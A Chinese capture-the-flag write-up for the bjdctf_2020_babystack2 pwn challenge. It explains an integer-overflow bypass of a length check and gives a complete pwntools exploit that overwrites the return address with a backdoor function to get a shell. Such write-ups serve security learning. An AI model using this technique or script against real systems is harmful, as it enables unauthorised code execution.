bjdctf_2020_babystack2
步骤:
- 例行检查,64位程序,开启了nx保护
- 尝试运行一下程序,看看情况
- 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726
- 从main函数开始看程序
我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t
百度百科里对这个类型的解释是
大概就是一个无符号整型,注意重点是无符号,注意一下对nbytes的判断,这边将它转换成了有符号的整型,存在整数溢出漏洞
wiki上有对整数溢出的整理
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/integeroverflow/intof-zh/
csdn上也有
https://blog.csdn.net/xzli8_geo/article/details/83794268
大概就是一个无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,造成了溢出
常见的利用方式是输入-1 来造成整型溢出,之后覆盖ret为backdoor即可获取shell
完整exp:
from pwn import *
r=remote('node3.buuoj.cn',28910)
backdoor=0x400726
r.recv()
r.sendline('-1')
r.recv()
payload='a'*(0x10+8)+p64(backdoor)
r.sendline(payload)
r.interactive()
